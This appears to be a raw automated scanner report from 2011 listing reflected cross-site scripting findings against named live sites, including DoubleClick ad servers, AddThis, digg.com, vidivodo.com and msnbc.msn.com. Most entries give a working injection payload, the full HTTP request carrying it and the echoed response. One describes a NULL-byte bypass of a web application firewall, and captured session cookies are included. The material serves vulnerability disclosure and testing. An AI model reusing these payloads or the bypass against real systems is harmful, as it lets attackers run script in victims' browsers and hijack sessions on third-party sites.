<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... nV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=19163406439bc2e"-alert(1)-"753a23f325e&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv% ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74280"-alert(1)-"91003d35e8d was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae74280"-alert(1)-"91003d35e8d&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae74280"-alert(1)-"91003d35e8d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/ ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774d7"-alert(1)-"f6155fedbbb was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1774d7"-alert(1)-"f6155fedbbb&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1774d7"-alert(1)-"f6155fedbbb&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d0e9"-alert(1)-"9eff1f734f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=441477849d0e9"-alert(1)-"9eff1f734f&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=441477849d0e9"-alert(1)-"9eff1f734f&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/db/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 946a5"-alert(1)-"1a0aec814e7 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G946a5"-alert(1)-"1a0aec814e7&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... twork_7999_Static.jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G946a5"-alert(1)-"1a0aec814e7&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d0ca"-alert(1)-"88694a35b67 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=2d0ca"-alert(1)-"88694a35b67 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=2d0ca"-alert(1)-"88694a35b67http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://deals.t-mobi ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb657"-alert(1)-"f4d7486d038 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!cb657"-alert(1)-"f4d7486d038&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... _Spring_Largest4GNetwork_7999_Static.jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!cb657"-alert(1)-"f4d7486d038&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B6249724 ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef65d'-alert(1)-'8220c360d70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.mediageneral.wspa/indexef65d'-alert(1)-'8220c360d70;kw=containerlinkswelike;pos=1;sz=253x300;ord=219492970500141.38? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n ');
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 25dfa<img%20src%3da%20onerror%3dalert(1)>af66eeb7010 was submitted in the q parameter. This input was echoed as 25dfa<img src=a onerror=alert(1)>af66eeb7010 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 6b952<script>alert(1)</script>065aa11fd08 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d34bc<script>alert(1)</script>eafa3fbf5c1 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=0J2F1ltJ97i&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Bd34bc<script>alert(1)</script>eafa3fbf5c1 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/mobile/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f515"><script>alert(1)</script>482e6e08913 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_star-telegram_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html&ctxtCat=news&outputCharEnc=latin1&css_url=http://media.star-telegram.com/static/mi/yahoo/css/yahoo.css3f515"><script>alert(1)</script>482e6e08913&tg=1&du=1&cb=1303613697383&ctxtContent=%3Chead%3E%3Clink%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%20href%3D%22%2F%2Fs7.addthis.com%2Fstatic%2Fr07%2Fwidget57.css%22%20media%3D%22all%22%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Star%20Telegram'%20%0A%7D%3B%0A%0A%0Avar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0%3Afunction(n)%7Bvar%20c%3Ddocument.cookie%3Bvar%20v%3Dc.match(new%20RegExp('%3B%5B%20%5D*' HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:11:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpsjNxNHFxMXQ0cTS3dXJXM0%2bLSi4sTU1JNbEBACNDCzdzUxMXJ2MAF7dYLQ0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 21-Apr-2021 03:11:09 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4702
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
The value of the offer request parameter is copied into the name of an HTML tag. The payload 141d3><script>alert(1)</script>de459fc0b76 was submitted in the offer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /subscriptions?offer=%22/%3E%3Cscript%3Ealert('JavaScript%20causes%20cancer')%3C/script%3E%3Cbr141d3><script>alert(1)</script>de459fc0b76 HTTP/1.1
Host: dailymail.subscribeonline.co.uk
Proxy-Connection: keep-alive
Referer: http://www.reddit.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ce19f"><script>alert(1)</script>ee3f151a8b3 was submitted in the REST URL parameter 1. This input was echoed as ce19f"><script>alert(1)</script>ee3f151a8b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00ce19f"><script>alert(1)</script>ee3f151a8b3 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 37473<script>alert(1)</script>bae200dcf22 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.star-telegram.com/p.json?callback=_ate.ad.hpr37473<script>alert(1)</script>bae200dcf22&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html&1wijfoh HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; dt=X; psc=4; uid=4dab4fa85facd099
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 24 Apr 2011 03:12:26 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24 May 2011 03:12:26 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 24 Apr 2011 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 03:12:26 GMT
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12ea"><script>alert(1)</script>52c39204099 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /379705/kemal-ataturk-ve-albert-einsteinb12ea"><script>alert(1)</script>52c39204099 HTTP/1.1
Host: en.vidivodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Video : kema ...[SNIP]... <link rel="canonical" href="http://www.vidivodo.com/379705/kemal-ataturk-ve-albert-einsteinb12ea"><script>alert(1)</script>52c39204099" /> ...[SNIP]...
2.26. http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://en.vidivodo.com
Path: /379705/kemal-ataturk-ve-albert-einstein
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f156c"><script>alert(1)</script>d1a37a5a2a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /379705/kemal-ataturk-ve-albert-einstein?f156c"><script>alert(1)</script>d1a37a5a2a0=1 HTTP/1.1
Host: en.vidivodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Video : kema ...[SNIP]... <link rel="canonical" href="http://www.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein?f156c"><script>alert(1)</script>d1a37a5a2a0=1" /> ...[SNIP]...
2.27. http://gadgetbox.msnbc.msn.com/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd71b"><script>alert(1)</script>c573188b1d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts?fd71b"><script>alert(1)</script>c573188b1d1=1 HTTP/1.1
Host: gadgetbox.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 23 Apr 2011 14:23:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89931
2.28. http://gadgetbox.msnbc.msn.com/_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9386e"><script>alert(1)</script>d85df39341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 23 Apr 2011 14:49:26 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 90175
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 54d54<img%20src%3da%20onerror%3dalert(1)>ebff4bedb1c was submitted in the path parameter. This input was echoed as 54d54<img src=a onerror=alert(1)>ebff4bedb1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Response
HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Length: 550
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sat, 23 Apr 2011 14:25:41 GMT
Connection: close
Vary: Accept-Encoding
